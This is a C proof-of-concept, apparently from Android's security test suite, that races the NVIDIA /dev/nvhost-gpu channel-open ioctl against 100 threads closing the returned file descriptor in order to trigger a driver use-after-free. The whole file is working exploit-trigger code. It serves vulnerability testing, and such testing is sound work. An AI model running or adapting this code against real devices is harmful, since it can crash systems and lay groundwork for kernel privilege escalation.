1 /* 2 * Copyright (C) 2017 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 #define _GNU_SOURCE 17 #include <string.h> 18 #include <stdio.h> 19 #include <stdlib.h> 20 #include <pthread.h> 21 #include <sys/ioctl.h> 22 #include <sys/mman.h> 23 #include <errno.h> 24 #include <sys/stat.h> 25 #include <fcntl.h> 26 #include <sched.h> 27 #include <sys/types.h> 28 #include <signal.h> 29 #include <unistd.h> 30 31 #define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno)) 32 #define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0])) 33 #define CLOSE_THREAD_NUM 100 34 #define TRY_TIMES 900 35 36 #define DEV "/dev/nvhost-gpu" 37 38 struct nvhost_channel_open_args { 39 __s32 channel_fd; 40 }; 41 42 #define NVHOST_IOCTL_MAGIC 'H' 43 #define NVHOST_IOCTL_CHANNEL_OPEN \ 44 _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args) 45 46 int fd; 47 pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 }; 48 pthread_t toggle_thread_id; 49 50 static int set_affinity(int num) 51 { 52 int ret = 0; 53 cpu_set_t mask; 54 CPU_ZERO(&mask); 55 CPU_SET(num, &mask); 56 ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask); 57 if(ret == -1){ 58 printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno)); 59 } 60 return ret; 61 } 62 63 static void prepare() 64 { 65 return; 66 } 67 68 volatile int target_fd; 69 volatile int attack; 70 void* close_thread(void* no_use) 71 { 72 set_affinity(1); 73 74 while(attack){ 75 usleep(200); 76 close(target_fd); 77 } 78 79 return NULL; 80 } 81 82 int main() 83 { 84 int i, try_time = TRY_TIMES, ret; 85 struct nvhost_channel_open_args o_args = { 0 }; 86 87 /* bind_cpu */ 88 set_affinity(0); 89 90 /* open dev */ 91 fd = open(DEV,O_RDONLY); 92 if(fd == -1){ 93 ERR("[-] open failed"); 94 return 0; 95 } else { 96 printf("[+] open OK\n"); 97 } 98 99 #if 1 100 ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args); 101 if(ret == -1) { 102 ERR("[-] ioctl failed"); 103 goto out_dev; 104 } else { 105 printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd); 106 } 107 108 target_fd = o_args.channel_fd; 109 #endif 110 111 /* create close thread */ 112 #if 1 113 attack = 1; 114 for(i = 0; i < CLOSE_THREAD_NUM; i++){ 115 ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL); 116 if(ret){ 117 printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno)); 118 goto out_close_thread; 119 } 120 } 121 #endif 122 123 #if 1 124 for(i = 0; i < TRY_TIMES; i++){ 125 printf("[+] %03d times\n", i); 126 /* open */ 127 ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args); 128 if(ret == -1) { 129 ERR("[-] ioctl failed"); 130 } else { 131 printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd); 132 } 133 usleep(200); 134 } 135 #endif 136 137 out_close_thread: 138 attack = 0; 139 /* kill close thread */ 140 for(i = 0; i < CLOSE_THREAD_NUM; i++){ 141 if(close_thread_id[i]) 142 pthread_join(close_thread_id[i], NULL); 143 } 144 out_dev: 145 close(fd); 146 return 0; 147 } 148
